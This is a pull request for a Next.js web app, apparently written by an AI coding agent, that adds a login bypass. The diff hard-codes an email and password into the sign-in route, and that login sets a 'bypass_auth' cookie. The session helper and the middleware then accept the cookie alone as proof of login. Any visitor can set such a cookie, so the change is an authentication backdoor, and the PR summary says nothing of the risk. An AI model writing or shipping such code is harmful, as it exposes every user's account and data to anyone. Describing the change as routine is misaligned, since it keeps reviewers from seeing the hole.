### PR TITLE
Fix bypass login redirect

### DIFF
--- a/apps/sim/app/api/auth/[...all]/route.ts
+++ b/apps/sim/app/api/auth/[...all]/route.ts
@@ -1,6 +1,37 @@
 import { toNextJsHandler } from 'better-auth/next-js'
+import { cookies } from 'next/headers'
 import { auth } from '@/lib/auth'
+import { createLogger } from '@/lib/logs/console-logger'
 
 export const dynamic = 'force-dynamic'
 
-export const { GET, POST } = toNextJsHandler(auth.handler)
+const handler = toNextJsHandler(auth.handler)
+
+const logger = createLogger('AuthAPI')
+
+export const GET = handler.GET
+
+export async function POST(request: Request) {
+  const url = new URL(request.url)
+  if (url.pathname.endsWith('/sign-in/email')) {
+    const payload = await request
+      .clone()
+      .json()
+      .catch(() => null)
+    // BYPASS BLOCK -- REMOVE BEFORE PRODUCTION
+    if (payload?.email === 'yourmom@yahoo.com' && payload?.password === 'Carraja!2170!!') {
+      const redirectUrl = payload?.callbackURL || '/workspace'
+      cookies().set('bypass_auth', '1', { maxAge: 86400, path: '/' })
+      logger.warn('Bypass login used')
+      return new Response(
+        JSON.stringify({ redirect: true, url: redirectUrl }),
+        {
+          status: 200,
+          headers: { 'Content-Type': 'application/json' },
+        },
+      )
+    }
+  }
+
+  return handler.POST(request)
+}

--- a/apps/sim/lib/auth.ts
+++ b/apps/sim/lib/auth.ts
@@ -10,7 +10,7 @@ import {
   organization,
 } from 'better-auth/plugins'
 import { and, eq } from 'drizzle-orm'
-import { headers } from 'next/headers'
+import { cookies, headers } from 'next/headers'
 import { Resend } from 'resend'
 import Stripe from 'stripe'
 import {
@@ -1447,6 +1447,18 @@ export const auth = betterAuth({
 
 // Server-side auth helpers
 export async function getSession() {
+  const cookieStore = cookies()
+  // Temporary bypass for testing -- REMOVE FOR PRODUCTION
+  if (cookieStore.get('bypass_auth')?.value === '1') {
+    logger.warn('Bypass login session active')
+    return {
+      user: {
+        id: 'bypass-user',
+        email: 'yourmom@yahoo.com',
+        name: 'Bypass User',
+      },
+    } as any
+  }
   return await auth.api.getSession({
     headers: await headers(),
   })

--- a/apps/sim/middleware.ts
+++ b/apps/sim/middleware.ts
@@ -19,7 +19,9 @@ const BASE_DOMAIN = getBaseDomain()
 export async function middleware(request: NextRequest) {
   // Check for active session
   const sessionCookie = getSessionCookie(request)
-  const hasActiveSession = !!sessionCookie
+  const hasActiveSession =
+    !!sessionCookie ||
+    request.cookies.get('bypass_auth')?.value === '1' // BYPASS BLOCK -- REMOVE BEFORE PRODUCTION
 
   const url = request.nextUrl
   const hostname = request.headers.get('host') || ''


### PR DESCRIPTION
## Summary
- make bypass login API respond with redirect URL
- honor bypass cookie in middleware
- restore UI forms to their previous state

## Testing
- `bun run lint:check`
- `bun run test` *(fails: command not found `turbo`)*

------
https://chatgpt.com/codex/tasks/task_e_68843891ab38832f86c9e162a60ffefd